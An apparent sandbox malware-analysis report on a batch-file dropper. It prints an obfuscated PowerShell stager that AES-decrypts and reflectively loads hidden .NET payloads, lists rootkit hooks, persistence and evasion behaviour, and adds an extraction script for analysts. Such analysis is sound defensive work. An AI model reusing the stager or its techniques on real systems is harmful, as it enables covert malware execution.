Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', 
'');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', 
'');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', 
'');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', 
'');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
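The four command lines above are one stager run twice from the original x.bat and twice from its copy at C:\Windows\$rbx-onimai2\$rbx-CO2.bat. Once the '*' padding that each Invoke-Expression strips is removed, it does the following: read the .bat, take the first line that begins with tdfVh, split the remainder on '\', undo a custom base64 alphabet ('#' stands for '/', '@' for 'A'), base64-decode, AES-256-CBC/PKCS7 decrypt with a hard-coded 32-byte key and 16-byte IV, gunzip, and hand the bytes to [Reflection.Assembly]::Load followed by EntryPoint.Invoke. The first two stages are invoked with a null argument list and the third with an empty string[], so the third carries a Main(string[]) entry point. Nothing is written to disk before the loaded stages run, and because cmd.exe echoes the script into a powershell.exe started with only -WindowStyle Hidden, the powershell command line itself carries none of it. The script below is an added example, not code from the report or from the sample: it reproduces the decoding chain with the key, IV, line marker and character substitutions taken from the stager, but writes each stage to disk with its SHA-256 instead of loading it. Function names and the output layout are assumptions of this example.

```powershell
# Added example (not from the report or the sample): static extraction of the three .NET
# payloads carried inside x.bat. Key, IV, the 'tdfVh' marker, the '\' separator and the
# '#'->'/' / '@'->'A' substitutions are the values visible in the stager above.
# Run only inside an isolated analysis VM: the input file is live malware.

function Unprotect-StagerBlob {
    # Reverses one payload slot: custom base64 -> AES-256-CBC/PKCS7 -> gzip.
    param([Parameter(Mandatory)][string]$Slot)

    # The stager restores standard base64 by mapping '#' back to '/' and '@' back to 'A'.
    $cipher = [Convert]::FromBase64String($Slot.Replace('#', '/').Replace('@', 'A'))

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24=')  # 32 bytes -> AES-256
    $aes.IV      = [Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA==')                      # 16 bytes
    $dec = $aes.CreateDecryptor()
    try     { $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }

    # The decrypted buffer is a gzip stream; inflating it yields the raw .NET assembly.
    $in  = New-Object System.IO.MemoryStream(,$plain)
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $out = New-Object System.IO.MemoryStream
    try     { $gz.CopyTo($out) }
    finally { $gz.Dispose(); $in.Dispose() }
    ,$out.ToArray()    # leading comma keeps the byte[] intact instead of unrolling it
}

function Export-StagerPayloads {
    # Finds the carrier line in the .bat, splits it into slots and dumps each decoded stage.
    param(
        [Parameter(Mandatory)][string]$BatPath,
        [string]$OutDir = (Join-Path (Split-Path -Parent $BatPath) 'stages')
    )
    $carrier = [IO.File]::ReadAllText($BatPath) -split "`r?`n" |
        Where-Object { $_.StartsWith('tdfVh') } | Select-Object -First 1
    if (-not $carrier) { throw "no line starting with 'tdfVh' in $BatPath" }

    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $i = 0
    foreach ($slot in $carrier.Substring(5).Split('\')) {
        $bytes = Unprotect-StagerBlob -Slot $slot
        $isPe  = ($bytes.Length -gt 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)   # 'MZ'
        $file  = Join-Path $OutDir ("stage{0}.bin" -f $i)
        [IO.File]::WriteAllBytes($file, $bytes)
        [pscustomobject]@{
            Stage  = $i
            Bytes  = $bytes.Length
            IsPE   = $isPe
            SHA256 = ($sha.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
            Path   = $file
        }
        $i++
    }
}

# Usage, with the path the report shows the stager reading:
Export-StagerPayloads -BatPath 'C:\Users\user\Desktop\x.bat' | Format-Table -AutoSize
```

Every slot should decode to a PE (IsPE true); a slot that does not means the carrier line was altered in transit or the key changed in a newer build. stage2.bin is the one the stager hands a string[] argument, so expect a console-style Main(string[]) there. The report later shows powershell.exe itself writing C:\Windows\$nya-onimai2\IfMUlU.exe and C:\Windows\$rbx-onimai2\$rbx-CO2.bat, so those paths are the first strings to look for inside the decoded stages.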
Source: IfMUlU.exe.28.drStatic PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC641E3C LoadLibraryA,GetProcAddress,SleepEx,9_2_00000225DC641E3C
Source: C:\Windows\System32\winlogon.exeCode function: 9_3_00000225DC62A7DD push rcx; retf 003Fh9_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exeCode function: 10_3_00000202C0ACA7DD push rcx; retf 003Fh10_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exeCode function: 11_3_000002A6612EA7DD push rcx; retf 003Fh11_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAF1AA7DD push rcx; retf 003Fh14_3_000002BAAF1AA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEDEA7DD push rcx; retf 003Fh14_3_000002BAAEDEA7DE
Source: C:\Windows\System32\dwm.exeCode function: 14_3_000002BAAEE4A7DD push rcx; retf 003Fh14_3_000002BAAEE4A7DE
Source: C:\Windows\System32\cmd.exeCode function: 15_3_000002512A6CA7DD push rcx; retf 003Fh15_3_000002512A6CA7DE
Source: C:\Windows\System32\conhost.exeCode function: 16_3_000001BEB0A1A7DD push rcx; retf 003Fh16_3_000001BEB0A1A7DE
Source: C:\Windows\System32\svchost.exeCode function: 20_3_0000026A879AA7DD push rcx; retf 003Fh20_3_0000026A879AA7DE
Source: C:\Windows\System32\svchost.exeCode function: 21_3_000001795378A7DD push rcx; retf 003Fh21_3_000001795378A7DE
Source: C:\Windows\System32\svchost.exeCode function: 22_3_000002295D54A7DD push rcx; retf 003Fh22_3_000002295D54A7DE
Source: C:\Windows\System32\svchost.exeCode function: 23_3_00000253067EA7DD push rcx; retf 003Fh23_3_00000253067EA7DE
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B3AA7DD push rcx; retf 003Fh24_3_000001845B3AA7DE
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFEA7DD push rcx; retf 003Fh25_3_000001ADEBFEA7DE
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D55905A7DD push rcx; retf 003Fh26_3_000001D55905A7DE
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E8A7DD push rcx; retf 003Fh29_3_00000241A9E8A7DE
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD7317A7DD push rcx; retf 003Fh30_3_000001CD7317A7DE

Persistence and Installation Behavior

Source: unknownExecutable created and started: C:\Windows\$nya-onimai2\IfMUlU.exe
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IfMUlU.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IfMUlU.exeJump to dropped file

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\$nya-SgIauazY

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: c:\users\user\desktop\x.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exe | Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle | 8_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\$nya-onimai2\IfMUlU.exe | Memory allocated: 246B6B00000 memory reserve | memory write watch
Source: C:\Windows\$nya-onimai2\IfMUlU.exe | Memory allocated: 246CEBD0000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5678Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4132Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5740Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3962Jump to behavior
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_8-612
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess graph_8-615
Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_8-574
Source: C:\Windows\System32\winlogon.exe API coverage: 6.2 %
Source: C:\Windows\System32\lsass.exe API coverage: 9.6 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.1 %
Source: C:\Windows\System32\dwm.exe API coverage: 6.1 %
Source: C:\Windows\System32\cmd.exe API coverage: 8.5 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 4.5 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe API coverage: 4.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe API coverage: 2.9 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 8.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632 Thread sleep count: 5678 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632 Thread sleep count: 4132 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1004 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2160 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6680 Thread sleep count: 211 > 30
Source: C:\Windows\System32\lsass.exe TID: 4248 Thread sleep count: 143 > 30
Source: C:\Windows\System32\svchost.exe TID: 1216 Thread sleep count: 175 > 30
Source: C:\Windows\System32\dwm.exe TID: 5800 Thread sleep count: 66 > 30
Source: C:\Windows\System32\svchost.exe TID: 2260 Thread sleep count: 133 > 30
Source: C:\Windows\System32\svchost.exe TID: 4456 Thread sleep count: 134 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616 Thread sleep count: 132 > 30
Source: C:\Windows\System32\svchost.exe TID: 4176 Thread sleep count: 125 > 30
Source: C:\Windows\System32\svchost.exe TID: 3592 Thread sleep count: 90 > 30
Source: C:\Windows\System32\svchost.exe TID: 6732 Thread sleep count: 112 > 30
Source: C:\Windows\System32\svchost.exe TID: 5024 Thread sleep count: 78 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6840 Thread sleep count: 90 > 30
Source: C:\Windows\System32\svchost.exe TID: 5164 Thread sleep count: 89 > 30
Source: C:\Windows\System32\svchost.exe TID: 3804 Thread sleep count: 86 > 30
Source: C:\Windows\System32\svchost.exe TID: 5664 Thread sleep count: 79 > 30
Source: C:\Windows\System32\svchost.exe TID: 1716 Thread sleep count: 76 > 30
Source: C:\Windows\System32\svchost.exe TID: 1988 Thread sleep count: 79 > 30
Source: C:\Windows\System32\svchost.exe TID: 5368 Thread sleep count: 76 > 30
Source: C:\Windows\System32\svchost.exe TID: 2008 Thread sleep count: 75 > 30
Source: C:\Windows\System32\svchost.exe TID: 2916 Thread sleep count: 73 > 30
Source: C:\Windows\System32\svchost.exe TID: 5952 Thread sleep count: 68 > 30
Source: C:\Windows\System32\svchost.exe TID: 5080 Thread sleep count: 63 > 30
Source: C:\Windows\System32\svchost.exe TID: 5268 Thread sleep count: 59 > 30
Source: C:\Windows\System32\svchost.exe TID: 5744 Thread sleep count: 49 > 30
Source: C:\Windows\System32\svchost.exe TID: 5944 Thread sleep count: 53 > 30
Source: C:\Windows\System32\svchost.exe TID: 6664 Thread sleep count: 48 > 30
Source: C:\Windows\System32\dllhost.exe TID: 4960 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1664 Thread sleep count: 44 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 5196 Thread sleep count: 34 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
